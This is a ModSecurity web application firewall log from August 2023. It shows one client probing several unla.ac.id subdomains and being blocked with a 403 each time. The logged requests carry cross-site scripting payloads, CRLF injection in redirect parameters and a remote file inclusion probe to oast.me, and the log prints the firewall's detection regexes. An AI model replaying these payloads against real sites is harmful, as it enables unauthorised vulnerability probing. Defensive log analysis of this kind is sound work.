[Tue Aug 29 11:53:11.920841 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAoLfQoAAAAG"]
[Tue Aug 29 11:53:11.924103 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15t8Co-f0AAAnd3QgAAAAI"]
[Tue Aug 29 11:53:11.927179 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15t8Co-f0AAAog@CoAAAAY"]
[Tue Aug 29 11:53:12.030597 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAoAkxIAAAAC"]
[Tue Aug 29 11:53:12.031825 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAnTlaIAAAAA"]
[Tue Aug 29 11:53:12.084197 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAoesLwAAAAV"]
[Tue Aug 29 11:53:12.102366 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAoLfQsAAAAG"]
[Tue Aug 29 11:53:12.119039 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15uMCo-f0AAAohZ7AAAAAZ"]
[Tue Aug 29 11:53:12.129287 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAoW7NYAAAAJ"]
[Tue Aug 29 11:53:12.191078 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAoqbPgAAAAj"]
[Tue Aug 29 11:53:12.561198 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15uMCo-f0AAAni-CAAAAAU"]
[Tue Aug 29 11:53:12.608660 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAog@CsAAAAY"]
[Tue Aug 29 11:53:12.608740 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAoZ6TYAAAAK"]
[Tue Aug 29 11:53:12.616442 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15uMCo-f0AAAni-CEAAAAU"]
[Tue Aug 29 11:53:12.686706 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAog@CwAAAAY"]
[Tue Aug 29 11:53:12.690522 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAoW7NgAAAAJ"]
[Tue Aug 29 11:53:12.713403 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAouCzMAAAAo"]
[Tue Aug 29 11:53:13.730778 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15ucCo-f0AAAog@C4AAAAY"]
[Tue Aug 29 11:53:13.962236 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15ucCo-f0AAAor7p8AAAAk"]
[Tue Aug 29 11:53:14.360333 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15usCo-f0AAAolKUUAAAAe"]
[Tue Aug 29 11:53:14.468712 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAnTlacAAAAA"]
[Tue Aug 29 11:53:14.476119 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAoLfQ8AAAAG"]
[Tue Aug 29 11:53:14.486694 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAoZ6TwAAAAK"]
[Tue Aug 29 11:53:14.489137 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAot8NIAAAAn"]
[Tue Aug 29 11:53:14.526377 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAoocxQAAAAh"]
[Tue Aug 29 11:53:14.596959 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAoT7VEAAAAD"]
[Tue Aug 29 11:53:14.599872 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAnTlaoAAAAA"]
[Tue Aug 29 11:53:14.601380 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAojapMAAAAb"]
[Tue Aug 29 11:53:14.602958 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAog@DEAAAAY"]
